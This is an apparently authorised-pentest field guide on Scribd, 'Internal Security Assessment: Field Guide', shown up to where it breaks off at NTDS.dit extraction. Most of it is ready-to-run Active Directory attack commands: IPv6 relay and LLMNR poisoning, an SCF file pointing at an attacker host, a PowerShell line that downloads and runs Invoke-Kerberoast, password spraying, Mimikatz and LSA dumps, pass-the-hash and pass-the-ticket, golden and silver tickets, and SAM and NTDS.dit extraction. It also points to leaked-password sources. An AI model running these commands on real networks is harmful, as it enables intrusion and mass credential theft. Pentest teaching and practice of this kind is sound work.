Scribd
Upload
13 views

Internal Field Guide

Uploaded by

djrazor3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views

Internal Field Guide

Uploaded by

djrazor3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 48

Internal Security

Assessment: Field
Guide
By Paul Seekamp
Table of Contents
RECONNAISSANCE ...................................................................................... 2
IPV4 NETWORK A CCESS CONTROL (NAC) BYPASS ................................................................ 3
U NAUTHENTICATED A SSET DISCOVERY .................................................................................. 3
A UTHENTICATED ASSET /USERNAME DISCOVERY ...................................................................... 5
PORT DISCOVERY ............................................................................................................ 6
VULNERABILITY IDENTI FICATION................................................................... 7
VULNERABILITY S CANNERS ................................................................................................. 8
INITIAL FOOTHOLD ...................................................................................... 9
DEFAULT CREDENTIALS .................................................................................................... 10
A CQUIRE CREDENTIALS ................................................................................................... 15
CRACKING HASHES ................................................................................... 19
WORDLISTS AND R ULES AND MASKS ................................................................................... 20
WINDOWS VERTICAL PRI VILEGE ESCALATION ............................................. 22
REMOTE USER TO ADMIN ................................................................................................. 23
WINDOWS HORIZONTAL P RIVILEGE ESCALATION ........................................ 25
LOGGED I N U SERS ......................................................................................................... 26
REMOTE MIMIKATZ /LSA DUMPS FROM LOCAL ADMIN ........................................................... 26
P ASS T HE H ASH (PTH) .................................................................................................... 27
P ASS T HE K EY (PTK) ....................................................................................................... 28
P ASS T HE TICKET (PTT) .................................................................................................... 30
S ILVER T ICKET ................................................................................................................ 31
GOLDEN T ICKET ............................................................................................................. 33
A UTOMATE LOCAL ADMIN T O DOMAIN ADMIN (NOISY) ....................................................... 35
CREDENTIAL PILLAGING ............................................................................ 36
E XTRACT SAM & C ACHED H ASHES M ANUALLY .................................................................... 37
E XTRACT NTDS. DIT H ASHES M ANUALLY .............................................................................. 37
E XTRACT NTDS. DIT H ASHES (AUTOMATED ) ......................................................................... 37
F IND P LAINTEXT P ASSWORDS ............................................................................................ 38
WPA PSK STRING E XTRACTION ........................................................................................ 40
WIRELESS .................................................................................................. 42
WPA/WPA2 H ASH C APTURE WITH U SERS ........................................................................... 43
WPA/WPA2 H ASH C APTURE WITHOUT U SERS (PMKID) ........................................................ 43
WPS ........................................................................................................................... 44
E NTERPRISE W IRELESS ...................................................................................................... 44
EVIL TWIN (SOCIAL E NGINEERING) .................................................................................... 45
OPEN WIRELESS ............................................................................................................. 45
WEP WIRELESS .............................................................................................................. 45

Internal Security Assessment: Field Guide Page 1


RECONNAISSANCE

Internal Security Assessment: Field Guide Page 2


IP V 4 N ETWORK A CCESS C ONTROL (NAC) B YPASS

Bypass IPv4 with IPv6


#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance
you will go undetected and be unchallenged.
#Use Metasploit to scan to determine if IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

mitm6
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqdn

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

U NAUTHENTICATED A SSET D ISCOVERY


#Various techniques to enumerate hosts and services
Private IPv4 Networks

10.0.0.0/8

172.16.0.0/12

192.168.0.0/16

ARP Scan

netdiscover -i eth0

Internal Security Assessment: Field Guide Page 3


NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS –p 445,22,80 <CIDR>/12--max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-


timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Port Scan

nmap -sP <CIDR>

Mass Scan

masscan <CIDR>‐‐top-ports 100

DNS Enumeration

fierce -dns example.com OR nmap --script dns-brute example.com

Internal Security Assessment: Field Guide Page 4


A UTHENTICATED A SSET /U SERNAME D ISCOVERY

Basic User Dump of AD Computers


https://github.com/dirkjanm/ldapdomaindump

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Basic User DNS Dump


https://github.com/dirkjanm/adidnsdump

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator


https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target>00 -Credential
domainuser | Format-Table –Autosize

Dump Global Address List


https://github.com/dafthack/MailSniper

Get-GlobalAddressList -ExchHostname exchange.example.local -Username [email protected]


-Password Password123

Dump Active Directory Usernames


https://github.com/dafthack/MailSniper

Get-ADUsernameFromEWS -Emaillist .\users.txt

Internal Security Assessment: Field Guide Page 5


P ORT D ISCOVERY

Rapid TCP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-


111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-
retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-
rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

Default TCP Port Scan


#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-


timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open -
-stats-every 10s -oX /tmp/nmap.xml

Rapid TCP/UDP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-


111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-
162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --
min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000
--open --stats-every 10s -oX /tmp/nmap.xml

Extensive TCP Port Scan


#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL targets.txt –p- --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-
rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --
open --stats-every 10s -oX /tmp/nmap.xml

Internal Security Assessment: Field Guide Page 6


VULNERABILITY IDENTIFICATION

Internal Security Assessment: Field Guide Page 7


V ULNERABILITY S CANNERS
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of
low hanging fruit.

Paid Scanning Tools Function

Tenable Nessus Infrastructure Vulnerability Scanner, Light


Application Analysis

Rapid7 Nexpose Infrastructure Vulnerability Scanner, Light


Application Analysis

Saint Infrastructure Vulnerability Scanner, Light


Application Analysis

BurpSuite Heavy, Manual Web Application Analysis

Acunetix Automated Web Application Analysis

Netsparker Automated Web Application Analysis

Free Scanning Tools Function

OpenVAS Infrastructure Vulnerability Scanner, Light


Application Analysis

Wapiti Web Application Analysis only

NMAP Scripts Infrastructure Vulnerability Scanner, Light


Application Analysis

Metasploit Auxiliary Modules Infrastructure Vulnerability Scanner, Light


Application Analysis

Internal Security Assessment: Field Guide Page 8


INITIAL FOOTHOLD

Internal Security Assessment: Field Guide Page 9


D EFAULT C REDENTIALS
#All of the tools below help to look for default credential usage. No one tool will find all the default
credentials.
NMAP Default Creds

nmap --script http-default-accounts -p


80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,808
8,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,
8080,443,8443,8081,9090,9091,8000,10443,22,21,23 –iL targets.txt –oX /tmp/default_creds.xml

Changeme Cred Scan


#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
https://github.com/ztgrace/changeme.git

changeme.py default_creds.xml

EyeWitness Active Cred Scan


#HTTP credential scanner.
https://github.com/FortyNorthSecurity/EyeWitness.git

Eyewitness -x default_creds.xml --active-scan --web

BruteSpray Cred Scan


#Imports an nmap XML file, and scans for the below supported services.
 ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin,
smbnt, smtp, svn, vmauthd, snmp
https://github.com/x90skysn3k/brutespray.git

python brutespray.py --file default_creds.xml --threads 5 --hosts 5

Brutex Cred Scan

Internal Security Assessment: Field Guide Page 10


#Automatically brute force all logins running on a target.
https://github.com/1N3/BruteX.git

brutex <target>

Metasploit Cred Scans


#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/printer/canon_iradv_pwd_extract

use auxiliary/scanner/telnet/lantronix_telnet_password

use auxiliary/scanner/db2/db2_auth

use auxiliary/scanner/ipmi/ipmi_dumphashes

auxiliary/admin/mssql/mssql_enum_sql_logins

auxiliary/admin/oracle/oracle_login

auxiliary/scanner/acpp/login

auxiliary/scanner/afp/afp_login

auxiliary/scanner/couchdb/couchdb_login

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/http/advantech_webaccess_login

auxiliary/scanner/http/appletv_login

auxiliary/scanner/http/axis_login

auxiliary/scanner/http/bavision_cam_login

auxiliary/scanner/http/binom3_login_config_pass_dump

auxiliary/scanner/http/buffalo_login

auxiliary/scanner/http/buildmaster_login

auxiliary/scanner/http/caidao_bruteforce_login

auxiliary/scanner/http/chef_webui_login

Internal Security Assessment: Field Guide Page 11


auxiliary/scanner/http/cisco_firepower_login

auxiliary/scanner/http/cnpilot_r_web_login_loot

auxiliary/scanner/http/directadmin_login

auxiliary/scanner/http/dlink_dir_300_615_http_login

auxiliary/scanner/http/dlink_dir_615h_http_login

auxiliary/scanner/http/dlink_dir_session_cgi_http_login

auxiliary/scanner/http/dolibarr_login

auxiliary/scanner/http/epmp1000_web_login

auxiliary/scanner/http/etherpad_duo_login

auxiliary/scanner/http/frontpage_login

auxiliary/scanner/http/gavazzi_em_login_loot

auxiliary/scanner/http/gitlab_login

auxiliary/scanner/http/glassfish_login

auxiliary/scanner/http/hp_sys_mgmt_login

auxiliary/scanner/http/http_login

auxiliary/scanner/http/ipboard_login

auxiliary/scanner/http/jenkins_login

auxiliary/scanner/http/joomla_bruteforce_login

auxiliary/scanner/http/manageengine_desktop_central_login

auxiliary/scanner/http/mybook_live_login

auxiliary/scanner/http/octopusdeploy_login

auxiliary/scanner/http/openmind_messageos_login

auxiliary/scanner/http/oracle_ilom_login

auxiliary/scanner/http/owa_ews_login

auxiliary/scanner/http/owa_login

Internal Security Assessment: Field Guide Page 12


auxiliary/scanner/http/phpmyadmin_login

auxiliary/scanner/http/pocketpad_login

auxiliary/scanner/http/splunk_web_login

auxiliary/scanner/http/symantec_web_gateway_login

auxiliary/scanner/http/tomcat_mgr_login

auxiliary/scanner/http/vcms_login

auxiliary/scanner/http/wordpress_login_enum

auxiliary/scanner/http/wordpress_xmlrpc_login

auxiliary/scanner/http/zabbix_login

auxiliary/scanner/lotus/lotus_domino_login

auxiliary/scanner/misc/cctv_dvr_login

auxiliary/scanner/misc/ibm_mq_login

auxiliary/scanner/mongodb/mongodb_login

auxiliary/scanner/msf/msf_rpc_login

auxiliary/scanner/msf/msf_web_login

auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/nessus/nessus_ntp_login

auxiliary/scanner/nessus/nessus_rest_login

auxiliary/scanner/nessus/nessus_xmlrpc_login

auxiliary/scanner/nexpose/nexpose_api_login

auxiliary/scanner/nntp/nntp_login

auxiliary/scanner/openvas/openvas_gsad_login

auxiliary/scanner/openvas/openvas_omp_login

auxiliary/scanner/openvas/openvas_otp_login

Internal Security Assessment: Field Guide Page 13


auxiliary/scanner/oracle/isqlplus_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/pop3/pop3_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/redis/redis_login

auxiliary/scanner/rservices/rexec_login

auxiliary/scanner/rservices/rlogin_login

auxiliary/scanner/rservices/rsh_login

auxiliary/scanner/sap/sap_mgmt_con_brute_login

auxiliary/scanner/sap/sap_soap_rfc_brute_login

auxiliary/scanner/sap/sap_web_gui_brute_login

auxiliary/scanner/scada/koyo_login

auxiliary/scanner/smb/smb_login

auxiliary/scanner/snmp/snmp_login

auxiliary/scanner/ssh/karaf_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/ssh/ssh_login_pubkey

auxiliary/scanner/telnet/brocade_enable_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/teradata/teradata_odbc_login

auxiliary/scanner/varnish/varnish_cli_login

auxiliary/scanner/vmware/vmauthd_login

auxiliary/scanner/vmware/vmware_http_login

auxiliary/scanner/vnc/vnc_login

Internal Security Assessment: Field Guide Page 14


auxiliary/scanner/winrm/winrm_login

auxiliary/voip/asterisk_login

auxiliary/scanner/http/epmp1000_dump_hashes

auxiliary/scanner/http/manageengine_deviceexpert_user_creds

auxiliary/scanner/http/surgenews_user_creds

auxiliary/scanner/ipmi/ipmi_dumphashes

auxiliary/scanner/lotus/lotus_domino_hashes

auxiliary/scanner/mssql/mssql_hashdump

auxiliary/scanner/mysql/mysql_authbypass_hashdump

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/oracle/oracle_hashdump

auxiliary/scanner/postgres/postgres_hashdump

auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing

auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence

auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir

auxiliary/scanner/snmp/brocade_enumhash

A CQUIRE C REDENTIALS

Automate reverse bruteforce, SCF upload, LLMNR/NBTNS/mDNS poisoning, SMB relay, IPv6
DNS poison
https://github.com/DanMcInerney/icebreaker.git

icebreaker.py -l targets.txt

SCF Upload

Internal Security Assessment: Field Guide Page 15


#SMB Share File attack.

Create an SCF file with the following:

[Shell] Command=2 IconFile=\\<attacker IP>\share\test.ico

[Taskbar] Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 –rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list smbrelay.txt

LLMNR/NBTNS/mDNS poisoning – Relay Hashes


#Configure Responder to redirect user auth. In responder.conf, set SMB,HTTP and HTTPS to OFF in
the list of servers to start, then:

responder -I eth0 –v

ntlmrelayx.py -tf smbrelay.txt

Devices with LDAP enabled


Finding printers
https://github.com/rvrsh3ll/SharpPrinter
https://github.com/percx/Praeda.git
Manual Exploit

Search for default credentials on printers with LDAP enabled

Internal Security Assessment: Field Guide Page 16


netcat -l -vv -p 444

Initiate an LDAP query.

Seth MiTM RDP Connections


https://github.com/SySS-Research/Seth

seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation


Impacket

mitm6 -i eth0-d <domain>

ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

secretsdump.py –k –no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
o Theharvester - https://github.com/laramies/theHarvester.git
o Linkedint - https://github.com/mdsecactivebreach/LinkedInt
o Raven - https://github.com/0x09AL/raven
o Hunter.io
o Weleakinfo.com - $2 purchase required
o Scylla - https://scylla.sh/
o ridenum.py 172.20.132.25 500 50000 | tee -a ridenum.log
https://github.com/Greenwolf/Spray.git

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod>


<LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

Internal Security Assessment: Field Guide Page 17


crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Internal Security Assessment: Field Guide Page 18


CRACKING HASHES

Internal Security Assessment: Field Guide Page 19


W ORDLISTS AND R ULES AND M ASKS

Wordlists
 https://mega.nz/#!aqRS2CJZ!TjbvyNcrXxMXNNRiUOIsz91NrzVuqm_r-Z_CZ_udD5Q
 https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
 https://github.com/danielmiessler/SecLists/tree/master/Passwords
 https://hashes.org/leaks.php

Create Company Specific Wordlist


#Businesses often share a common password related to the business.
https://github.com/digininja/CeWL

cewl -d 3 -m 4 -w /tmp/cewl-wordlist.txt http://domain.com

Common Hashes to Crack (Hashcat)


900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2
5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)

Convert MScach2 from Metasploit to Hashcat Format

cd ~/.msf4/loot && cat *mscache* | cut -d '"' -f 2,4 | sed s/\"/\:/g | tr -cd '\
11\12\40-\176' | grep -v Username | cut -d : -f 1,2 | awk -F':' '{print $2,$1}'
| sed 's/ /:/g' > mscache.hash

Internal Security Assessment: Field Guide Page 20


Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r


/usr/share/hashcat/rules/d3ad0ne.rule

Combination Attack

hashcat -m 0 -a 1 hash.txt dict1.txt dict2.txt

Internal Security Assessment: Field Guide Page 21


WINDOWS VERTICAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 22


R EMOTE U SER TO A DMIN

Kerberoast
https://github.com/SecureAuthCorp/impacket.git (Linux)

GetUserSPNs.py –request domain.info/notanadmin

https://github.com/GhostPack/Rubeus.git (Windows)

.\Rubeus.exe kerberoast /outfile:

PowerShell

iex (new-object
Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data
/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat <TGSs_format
[hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Extract GPP Credentials


https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb DC_IP_ADDR –u notanadmin –p Password123 –d domain –M gpp_password

MS Exchange – Domain Escalation


https://github.com/dirkjanm/PrivExchange

ntlmrelayx.py -t ldap://dc.example.local --escalate-user notanadmin

python privexchange.py -ah attacker.example.local exchange.example.local -u notanadmin -d


example.local

secretsdump.py example.local/[email protected] –just-dc

Active Directory Low Hanging Fruit Check

Internal Security Assessment: Field Guide Page 23


pingcastle.exe –healthcheck –server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --
password <PASSWORD>

Internal Security Assessment: Field Guide Page 24


WINDOWS HORIZONTAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 25


L OGGED I N U SERS

Crackmapexec

crackmapexec smb 192.168.1.0/24 -u username -p Password123 –d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

pingcastle.exe --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password


<PASSWORD>

Bloodhound
https://github.com/BloodHoundAD/BloodHound

neo4j start

python http://bloodhound.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc


<DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound – LSASSY
https://github.com/Hackndo/lsassy/tree/master/cme
#Must patch CrackMapExec first

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o


BLOODHOUND=True NEO4JPASS=bloodhound

R EMOTE M IMIKATZ /LSA D UMPS F ROM L OCAL A DMIN

Dump LSA secrets


Crackmapexec

Internal Security Assessment: Field Guide Page 26


https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb targets.txt -u localadmin -p Password123 –d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Lsassy
https://github.com/Hackndo/lsassy

lsassy -d adsec.local/pixis:[email protected]

Dump with Mimikatz


Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
https://github.com/gojhonny/CredCrack

credcrack.py -f targets.txt -d domain -u localadmin -l <target>

P ASS T HE H ASH (PTH)

Internal Security Assessment: Field Guide Page 27


Dump SAM file (1)
Crackmapexec

crackmapexec smb targets.txt -u localadmin -p Password123 –d domain –sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOST, SMBUser, SMBPass, SMBdomain, run

Pass the Hash (2)


Crackmapexec

crackmapexec smb targets.txt -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C –d


LOCALHOST

Metasploit

use exploit/windows/smb/psexec

Set: RHOST, SMBUser, SMBPass LM:NTLM, run

P ASS T HE K EY (PTK)

Request The TGT via Linux (1)


Impacket
https://github.com/SecureAuthCorp/impacket.git
#Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

Internal Security Assessment: Field Guide Page 28


python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/GhostPack/Rubeus.git
#Request the TGT with hash

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)


#Execute a cmd on the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Internal Security Assessment: Field Guide Page 29


P ASS T HE T ICKET (PTT)
Harvest tickets on Linux host (1)

grep default_ccache_name /etc/krb5.conf

OR

grep default_ccache_name /tmp/krb5cc_%{uid}

OR

#If user is root Tickey will inject into other user processes. Must be in a reachable folder.

https://github.com/TarlogicSecurity/tickey.git

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Harvest tickets from Windows (1)


Mimikatz
https://github.com/gentilkiwi/mimikatz

Internal Security Assessment: Field Guide Page 30


mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
https://github.com/GhostPack/Rubeus.git

.\Rubeus dump

Inject Ticket via Windows (2)


Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

PsExec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

S ILVER T ICKET

Request The TGT via Linux (1)


https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn


<service_spn> <user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn


<service_spn> <user_name>

Set Ticket via Linux (2)

Internal Security Assessment: Field Guide Page 31


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

Internal Security Assessment: Field Guide Page 32


.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

G OLDEN T ICKET
Request The TGT via Linux (1)
https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>


<user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>


<user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)

Internal Security Assessment: Field Guide Page 33


https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash>


/user:<user_name>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>


/user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>


/user:<user_name>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Internal Security Assessment: Field Guide Page 34


A UTOMATE L OCAL A DMIN T O D OMAIN A DMIN (N OISY )
Initiate Deathstar
https://github.com/EmpireProject/Empire

python empire --rest --username empireadmin --password Password123

https://github.com/byt3bl33d3r/DeathStar

DeathStar.py

Execute DeathStar

crackmapexec smb targets.txt -u username -p password –d domain -M empire_exec -o


LISTENER=DeathStar

Internal Security Assessment: Field Guide Page 35


CREDENTIAL PILLAGING

Internal Security Assessment: Field Guide Page 36


E XTRACT SAM & C ACHED H ASHES M ANUALLY

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

E XTRACT NTDS. DIT H ASHES M ANUALLY

Manual NTDS.dit Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM
c:\SYSTEM

Manual NTDS.dit Extraction using ntdsutil (1)
